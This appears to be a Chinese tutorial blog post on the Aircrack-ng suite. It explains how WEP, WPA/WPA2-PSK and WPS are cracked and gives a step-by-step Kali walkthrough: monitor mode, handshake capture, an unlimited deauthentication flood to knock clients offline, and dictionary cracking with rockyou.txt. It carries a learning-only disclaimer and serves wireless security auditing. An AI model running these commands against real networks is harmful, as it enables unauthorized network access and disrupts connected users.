Aircrack-ng套件——无线破解原理及工具详解
前言:
现行的无线协议标准在安全方面是完全达标的,是非常安全的。如果现行的无线标准在很被攻破了,业界为什么还一直在使用这一标准。
因此,破解之所以能成功,完全是因为USR配置路由器不当和密码强度低的漏洞罢了。
普通无线加密及破解的分类:
1,wep加密:此类加密比较老旧,现在的无线路由器已经很少使用此类加密方式,破解只需要大量的数据包即可。
2,WPA / WPA2 PSK加密:这类加密是很安全的,破解的方式是抓握手包然后跑字典。
3,一部分路由器为了方便用户,设置了QSS快速连接功能(或者叫WPS功能)。破解方式是抓握手包跑字典和跑PIN码2种。
工具:
1,一块支持混杂模式(监听模式)的无线网卡。
2,一个支持无线破解工具的系统(像的CDlinux的,卡利,BT5等)
3,一台配置不错的电脑以及强大的字典
工具作用:
无线网卡:用来抓包,要想破解无线你必须把空中的无线数据监听下来,存成一个文件网卡只有这一个功能,也只有这一个用处,就是用它来抓取周围的无线数据包,把它存到文件里。供后来的程序分析用。
系统:用来驱动网卡和分析数据网卡虽然能支持混杂模式(监听模式),但是需要系统驱动程序来调用它,不是所有的系统都能支持把网卡设置为监听模式,这里我们一般用的就是卡利,把CDlinux的。
配置不错的电脑:用来计算密码明文因为周围的数据包都是加密的,网卡监听到的数据自然也是加密的,要想通过这些加密的数据把密码计算出来,我们需要一台计算能力强劲的电脑,以及一本强大的字典。
破解原理
WEP加密的就不谈了,无非就是抓上个十分钟的IVS数据包,然后用工具计算出来即可。
1,WPA / WPA2破解原理
首先要抓包:这一步主要靠网卡。
什么是握手包:无线信号是加密的,如果你要连接无线路由器,就要给路由器发送一个请求,请求和无线路由器建立连接,这个请求就在一个你要发送的数据包里,学名叫握手包,这个包里面包含了你发送过去的一个密码,但是这个密码是加密的。
所以我们要破解的无线网络连接我们首先要抓到这个包,里面有加密过的密码,我们只要抓到这个包,再用电脑根据这个加密后的数据反算密码就行了。
而握手包只在设备与路由器刚开始连接的时候由设备发送给路由器,认证成功后就不再发送了,所以我们要想抓住这个包我们必须等到有设备和路由器刚要建立连接时来抓,当然我们有更好的方法,就是用一个方法断开一个已经连接到路由器的设备,等它再自动和路由器连接的时候抓住那个握手包。
然后就是跑包,这一步就和网卡没有关系了,全靠电脑和字典。
跑包:跑包就是用同样的算法把字典里的密码加密,然后将结果与握手包里的密文进行比对如果一样那么也就知道了原密码说白了就是拿密码一个个的试,看看哪个是对的。
因此跑包能不能跑出来完全取决你的字典里有没有包含真正的密码。还取决于你的电脑配置够不够强,能不能在可以等待的时间内跑完字典。
2,破解WPS路由器
这个要求路由器开了WPS,而且还没有做WPS连接限制和尝试时间间隔限制,并且信号还要好在PWR在70的绝对值以内。
移步:https://blog.csdn.net/tanyl168/article/details/84768957 (Reaver无线破解工具 - 穷举PIN码破解简析)
https://blog.csdn.net/tanyl168/article/details/84770597 (Fern wifi cracker 无线破解工具——图解)
详细步骤:
1.开启kali系统后,插入最常见使用3370芯片的USB无线网卡,免驱。检查网卡,及状态.
root@ kali:~#ifconfig -a
root@kali:~# ifconfig //查看网络配置,网卡是否加载成功。有时需要加 -a参数网卡加载成功,一般在下方会显示3块:
etho:lo:wlan0:常见的网卡名称则显示在此。若未加载成功,请查看vmware的player选项内,可移动设备。或按提示安装驱动。
2.开启网卡监听模式
root @ kali:~#airmon-ng start wlan0
root@kali:~# airmon-ng start wlan0 //wlan0为前面查到的网卡名称
可再通过ifconfig命令,查看监听模式是否开启成功。此时成功开启监听,网卡名称变成了:wlan0mon
3.扫描监听热点
root @ kali:〜#airodump-ng wlan0mon
root@kali: ~# airodump-ng wlan0mon
4.选择一个来抓取握手包
root @kali:〜#airodump-ng -c <信道> --bssid <路由ID> -w <存储抓包的目录名称> <网卡名称>
root@kali: ~# airodump-ng -c 3 --bssid D4:EE:07:39:F5:DE -w /root/桌面 wlan0mon
//等待新设备连接,抓取握手包或进行第5步
5.洪水攻击,强制打掉重连
root@kali:〜#aireplay-ng -0 0 -a <bssid路由ID> -c <连接wifi的mac IP> <网卡名>
root@kali: ~#aireplay-ng -0 0 -a D4:EE:07:39:F5:DE -c D8:5D:E2:96:AB:EB wlan0mon
// - 0参数为用deauth洪水攻击,0为无限,-0 5则攻击5次,数字表示次数。
攻击原理是:。先打掉USR的无线网络连接,消除身份认证此时MAC电脑,PC,手机USR只能手动连接,若无限攻击则USR无法连接上客户端会要求重输密码,这时会有握手包,如不断开攻击,则一直无法连接上。
假如攻击2次停止,USR客户端会自动重连,这时亦会自动抓取握手包。
6.停止攻击
ctrl + c当终端右上方出现:WPA握手:D8:5D:22:96:AB字样则说明抓包完成,停止攻击
抓包完成可关闭监听模式:root @ kali:〜#airmon- ng stop wlan0mon(网卡名)
root@kali: ~# airmon-ng stop wlan0mon(网卡名)
7.爆破
root @ kali:〜#aircrack-ng -w /usr/share/wordlists/rockyou.txt / root /桌面-1.cap
root@kali: ~# aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/桌面-1.cap
// - a2参数:<代表WPA握手包>,可添加至命令执行
// - w参数:指定字典文件路径,rockyou.txt为kali自带字典,使用前须先解压:
root @ kali:〜#gzip -d /usr/share/wordlists/rockyou.txt.gz
// root /桌面-1.cap:抓取的密码包路径(可通过手动查看相应路径)
8.静待结果
一本强大的字典能加快跑包成功的效率和成功率。跑包成功会在中间有提示!
后记:
Aircrack- ng是评估WiFi网络安全性的一整套工具。
- Aircrack-ng无线密码破解
- Aireplay-ng流量生成和客户端认证
- Airodump-ng数据包捕获
- Airbase-ng虚假接入点配置
它侧重于无线网络安全的不同领域:
监控:数据包捕获和数据导出到文本文件,以供工具第三方进一步处理
攻击:通过数据包注入重播攻击,解除身份验证,虚假接入点等
测试:检查无线网络卡和驱动程序功能(捕获和注入)
破解:WEP和WPA PSK(WPA 1和2)
。所有工具都是命令行,允许繁重的脚本很多GUI都利用了这个功能它主要用于Linux的,
但也适用于视窗,OS X,FreeBSD中,OpenBSD,NetBSD,以及Solaris甚至eComStation 2。
如果您在注入问题时遇到问题,或者如果您在airodump-ng(屏幕右上角)或aireplay-ng中收到有关通道-1或固定通道的错误消息,请airmon-ng check kill在将无线卡放入监视器之前使用网络管理器模式
.root@kali:~# airmon-ng check kill此命令会关闭影响破解程序的进程。可在破解前使用
<无线审计随笔,仅作学习参考使用,参考文献:37实验室,Aircrack和了社区>
Aircrack-ng套件——无线破解原理及工具详解相关推荐
- java的markword_【转帖】Java工具结构与锁实现原理及MarkWord详解
Java工具结构与锁实现原理及MarkWord详解 https://www.pianshen.com/article/2382167638/ 我们都知道,Java工具存储在堆(Heap)内存.那么一个 ...
- Nginx(二):反向代理原理 与 配置文件详解
相关阅读: Nginx(一):Nginx原理概述 与 安装步骤详解 Nginx(二):反向代理原理 与 配置文件详解 Nginx(三):负载均衡策略 与 Nginx静态服务器 Nginx(四):Ngi ...
- python嗅探工具详解附源码(使用socket,带tkinter界面)
python嗅探工具详解(带tkinter界面) 点击详见原理 点击详见原理 TCP/IP协议号补充 必备基础知识 IP数据包格式 详见点此 TCP报文格式 详见点此 struct模块 在Python ...
- Cookie的工作原理和应用详解
Cookie的工作原理和应用详解 1. Cookie 原理 1.1 Cookie 背景信息 1.2 Cookie 工作原理 1.3 Cookie 创建.获取.修改 1.4 Cookie 共享范围 1. ...
- Pytorch | yolov3原理及代码详解(二)
阅前可看: Pytorch | yolov3原理及代码详解(一) https://blog.csdn.net/qq_24739717/article/details/92399359 分析代码: ht ...
- Dubbo 原理和机制详解
Dubbo 是一款Java RPC框架,致力于提供高性能的 RPC 远程服务调用方案.作为主流的微服务框架之一,Dubbo 为开发人员带来了非常多的便利. 1. Dubbo核心功能 Dubbo主要提供 ...
- 大型企业中如何批量管理千万台服务器之ansible自动化运维工具详解 [⭐建议收藏⭐]
文章目录 ansible 自动化运维工具 详解 关于作者 作者介绍 一.ansible 概述 1.1 ansible 概述 1.2 是什么要使用 ansible 1.3 ansible 功能 1.4 ...
- 哈希算法的原理和用途详解
什么是哈希算法?哈希是一种加密算法,也称为散列函数或杂凑函数.哈希函数是一个公开函数,可以将任意长度的消息M映射成为一个长度较短且长度固定的值H(M),称H(M)为哈希值.散列值(Hash Value ...
- Android Lint 原理及使用详解
Android Lint 原理及使用详解 Android Lint 是 ADT 16中引入的新工具,用于扫描 Android 项目源中的潜在错误. Lint 是 Android 提供的一个强大的,用于 ...
- rpm包安装和卸载,rpm查询,yum工具详解,yum仓库搭建
rpm包安装和卸载 [root@binbinlinux Packages]# rpm -ivh zip-3.0-1.el6.x86_64.rpm 安装rpm包命令 ivh I=安装的意思in ...
最新文章
- golang笔记——struct
- java无法实例化类型_java – 无法实例化泛型中的类型
- VS 中配置使用Visual SVN系列 四:SVN Server配置和使用
- [译]RabbitMQ教程C#版 - 发布订阅
- CodeForces 1491G Switch and Flip(结论)
- [转]html超链接打开的窗口大小
- 珍爱生命,远离大厂政治斗争
- Maven实战. 3.7NetBeans Maven插件简单使用
- DirectShow--A.枚举设备
- 01-09 Linux三剑客-sed
- 如何在 GitHub 上大显身手?
- python 解析pb文件_利用Python解析json文件
- Prometheus 监控linux服务器
- 基于软件仿真的PLC系统测试技术
- Redis Operator学习笔记
- dojo基础:dojo/request
- css float与学习骑自行车
- 如何做好实施前准备?
- C++ map操作下标问题
- python能打包成apk吗_超详细APK打包教程
热门文章
- vite 本地运行首次进入页面加载慢问题
- 性能测试——jmeter性能测试——重点—核心——线程组、Ramp-Up Period、Loop Count 次采样...
- 计算机管理内默认共享,Win10共享默认在哪里关闭 清除默认共享哪种方法比较彻底...
- loss weight
- rto净化效率计算公式_rto废气处理原理
- 估算CarSim中车辆轮胎的纵向刚度与侧向刚度
- LCD3D打印机和DLP3D打印技术的区别详解
- SATA、mSATA 、PCIe和M.2——SSD硬盘的接口详解
- node 生成随机头像_给微信设置卡通头像,再不怕撞脸!
- 常用项目文档目录示例